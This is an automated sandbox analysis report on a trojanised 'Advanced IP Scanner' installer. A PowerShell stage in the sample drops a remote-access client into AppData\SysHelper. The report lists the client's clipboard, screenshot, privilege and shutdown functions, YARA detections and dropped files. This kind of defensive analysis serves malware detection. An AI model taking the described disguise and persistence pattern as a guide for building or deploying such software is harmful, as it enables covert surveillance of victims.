Source: client32.exe, 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2083867183.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2164943299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.pci.co.uk/supportsupport
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.radmin.com
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.0000000005269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.5.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.0000000005269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.5.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.2099926952.0000000002D24000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.ultimatenetworktool.com
Source: Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.2099926952.0000000002D33000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2091844461.000000000267A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.ultimatenetworktool.com/support
Source: Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.2099926952.0000000002D33000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2091844461.000000000267A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.ultimatenetworktool.com/update
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2091844461.000000000266C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.ultimatenetworktool.com1
Source: powershell.exe, 00000005.00000002.1992936334.0000000004C31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000005.00000002.2006771034.000000000669B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2006771034.000000000669B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2006771034.000000000669B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2095942148.000000000018C000.00000004.00000010.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.0000000005269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.0000000004D83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp, is-7MB5M.tmp.1.dr, AudioCapture.dll.5.dr, is-JTIOC.tmp.1.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: is-JTIOC.tmp.1.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2095942148.000000000018C000.00000004.00000010.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, is-7MB5M.tmp.1.dr, is-JTIOC.tmp.1.dr	String found in binary or memory: https://d.symcb.com/rpa0)
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, is-7MB5M.tmp.1.dr, is-JTIOC.tmp.1.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: powershell.exe, 00000005.00000002.1992936334.0000000004D83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: Advanced_IP_Scanner_2.5.4594.12.exe	String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: powershell.exe, 00000005.00000002.2006771034.000000000669B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr, remcmdstub.exe.5.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr, remcmdstub.exe.5.dr	String found in binary or memory: https://sectigo.com/CPS0D
Source: Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1723461870.000000007EF1B000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1722972586.00000000033D0000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000000.1725364189.00000000003F1000.00000020.00000001.01000000.00000004.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp.0.dr	String found in binary or memory: https://www.innosetup.com/
Source: Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1723461870.000000007EF1B000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1722972586.00000000033D0000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000000.1725364189.00000000003F1000.00000020.00000001.01000000.00000004.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp.0.dr	String found in binary or memory: https://www.remobjects.com/ps

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,

7_2_1101F360

Contains functionality to modify clipboard data

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,	7_2_1101F360
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11032930 GetClipboardFormatNameA,SetClipboardData,	7_2_11032930
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,	8_2_1101F360
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11032930 GetClipboardFormatNameA,SetClipboardData,	8_2_11032930

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_11031AC0 IsClipboardFormatAvailable,GetClipboardData,GlobalSize,GlobalLock,_memmove,GlobalUnlock,

7_2_11031AC0

Contains functionality to record screenshots

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_11007720 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,

7_2_11007720

Yara detected Keylogger Generic

Source: Yara match	File source: 10.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2164887395.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2083823196.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: client32.exe PID: 8036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 8168, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 4564, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SysHelper\PCICL32.DLL, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11112840 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,		7_2_11112840
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11112840 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,		8_2_11112840

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_7872.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7872, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\pcicapi.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\AudioCapture.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\PCICHEK.DLL	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\remcmdstub.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\PCICL32.DLL	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\HTCTL32.DLL	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\msvcr100.dll	Jump to dropped file

Abnormal high CPU Usage

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Process Stats: CPU usage > 49%

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_110A9240: DeviceIoControl,

7_2_110A9240

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_1115A340 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,

7_2_1115A340

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,		7_2_1102CE2D
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,		8_2_1102CE2D

Detected potential crypto function

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11029230	7_2_11029230
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11072460	7_2_11072460
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1115B180	7_2_1115B180
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1107F520	7_2_1107F520
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1101B980	7_2_1101B980
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1115F9F0	7_2_1115F9F0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1101BDC0	7_2_1101BDC0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11163C55	7_2_11163C55
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11050430	7_2_11050430
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_110088DB	7_2_110088DB
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1101CBE0	7_2_1101CBE0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11032A60	7_2_11032A60
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11086DA0	7_2_11086DA0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11044C60	7_2_11044C60
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_6859A980	7_2_6859A980
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_685C4910	7_2_685C4910
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_685C3923	7_2_685C3923
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_6859DBA0	7_2_6859DBA0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_685C3DB8	7_2_685C3DB8
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_685CA063	7_2_685CA063
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_685C4156	7_2_685C4156
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_68591310	7_2_68591310
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_685B43C0	7_2_685B43C0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_685A84F0	7_2_685A84F0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_685C4528	7_2_685C4528
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_68591760	7_2_68591760
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_68860915	7_2_68860915
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_68800919	7_2_68800919
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_6881EB1A	7_2_6881EB1A
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1115B180	8_2_1115B180
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11029230	8_2_11029230
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1107F520	8_2_1107F520
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1101B980	8_2_1101B980
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1115F9F0	8_2_1115F9F0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1101BDC0	8_2_1101BDC0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11163C55	8_2_11163C55
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11050430	8_2_11050430
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11072460	8_2_11072460
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_110088DB	8_2_110088DB
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1101CBE0	8_2_1101CBE0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11032A60	8_2_11032A60
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11086DA0	8_2_11086DA0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11044C60	8_2_11044C60

Enables security privileges

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Process token adjusted: Security

Jump to behavior

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 685A7A90 appears 62 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 685930A0 appears 54 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 11142A60 appears 1055 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 685BF3CB appears 33 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 685A7C70 appears 36 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 1116B7E0 appears 54 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 111434D0 appears 42 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 11160790 appears 64 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 685A7D00 appears 135 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 685B9480 appears 60 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 68596F50 appears 171 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 11080C50 appears 64 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 1115CBB3 appears 92 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 110290F0 appears 1919 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 1105D340 appears 492 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 1109CBD0 appears 32 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 1105D470 appears 41 times
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: String function: 11027550 appears 94 times

PE file contains executable resources (Code or Archives)

Source: Advanced_IP_Scanner_2.5.4594.12.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-CD8F9.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows

PE file contains more sections than normal

Source: is-CD8F9.tmp.1.dr	Static PE information: Number of sections : 11 > 10
Source: Advanced_IP_Scanner_2.5.4594.12.exe	Static PE information: Number of sections : 11 > 10
Source: Advanced_IP_Scanner_2.5.4594.12.tmp.0.dr	Static PE information: Number of sections : 11 > 10

PE file does not import any functions

Source: is-V7TQP.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-OBI2J.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-D0PHJ.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-7B70A.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-NE6KC.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-8VUCH.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-KNEGU.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-PIDI5.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-5BCDU.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-DUVAI.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-CEPGI.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-G3D36.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-3SOVH.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-4RR0D.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-OT0US.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-FRMIK.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-DFCT3.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-92959.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-H6NSK.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-46V0R.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-3K2R2.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-CQ3UL.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-QAUD7.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-VRSD9.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-N93NO.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-OJCV9.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-MMC0L.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-IE1PQ.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-NKCKG.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-IENMB.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-15NDN.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-SF594.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-P26AP.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-D20H8.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-GHBG6.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-UUCTA.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-56ICT.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-DFL4O.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-JPUOQ.tmp.1.dr	Static PE information: No import functions for PE file found
Source: is-7V6MF.tmp.1.dr	Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000000.1717068008.0000000000CB9000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs Advanced_IP_Scanner_2.5.4594.12.exe
Source: Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1723461870.000000007F20B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs Advanced_IP_Scanner_2.5.4594.12.exe
Source: Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1722972586.00000000034DF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs Advanced_IP_Scanner_2.5.4594.12.exe
Source: Advanced_IP_Scanner_2.5.4594.12.exe	Binary or memory string: OriginalFileName vs Advanced_IP_Scanner_2.5.4594.12.exe

Uses 32bit PE files

Source: Advanced_IP_Scanner_2.5.4594.12.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: amsi32_7872.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7872, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal56.rans.spre.troj.evad.winEXE@10/300@3/3

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_11059270 GetLastError,FormatMessageA,LocalFree,

7_2_11059270

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1109C750 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,	7_2_1109C750
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1109C7E0 AdjustTokenPrivileges,CloseHandle,	7_2_1109C7E0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1109C750 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,	8_2_1109C750
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1109C7E0 AdjustTokenPrivileges,CloseHandle,	8_2_1109C7E0

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_11095C90 GetTickCount,CoInitialize,CLSIDFromProgID,CoCreateInstance,CoUninitialize,

7_2_11095C90

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_11088290 FindResourceA,LoadResource,LockResource,

7_2_11088290

Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp

File created: C:\Program Files (x86)\Advanced IP Scanner

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\SysHelper

Jump to behavior

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03

Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe

File created: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp

Jump to behavior

Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp

File read: C:\Program Files (x86)\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: Advanced_IP_Scanner_2.5.4594.12.exe

String found in binary or memory: /LOADINF="filename"

Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe

